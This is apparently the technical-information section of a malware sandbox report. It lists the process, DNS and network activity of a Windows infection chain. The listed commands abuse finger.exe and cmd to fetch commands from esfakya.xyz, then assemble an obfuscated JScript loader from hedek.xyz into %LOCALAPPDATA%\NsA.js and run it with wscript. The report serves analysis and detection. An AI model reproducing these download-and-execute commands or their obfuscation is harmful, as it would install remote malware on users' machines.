Technical Information
- '<SYSTEM32>\finger.exe' ok@croo8y.esfakya.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\NsA.js"
- %LOCALAPPDATA%\nsa.js
- 'cr####.esfakya.xyz':79
- 'be####.hedek.xyz':80
- 'cr####.esfakya.xyz':79
- DNS ASK cr####.esfakya.xyz
- DNS ASK be####.hedek.xyz
- '<SYSTEM32>\cmd.exe' /c finger ok@croo8y.esfakya.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt DZDB=.j&&SEt UGYTF=v1xJear1xJe a =1xJe 'sc1xJeri1xJept1xJe:'; b =1xJe 'h1xJeTtP1xJe:'; G1xJeet1xJeObj1xJeec1xJet(1xJea+b+'&&sET 31XY=LWKWYLWKWYbeiie2.hedek.xyzLWKWY?1LWKWY')&&sEt/^p...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p T9P36="%UGYTF:1xJe=%%31XY:LWKWY=/%" 0<nul 1>%LOCALAPPDATA%\NsA%DZDB%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\NsA%DZDB%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\NsA.js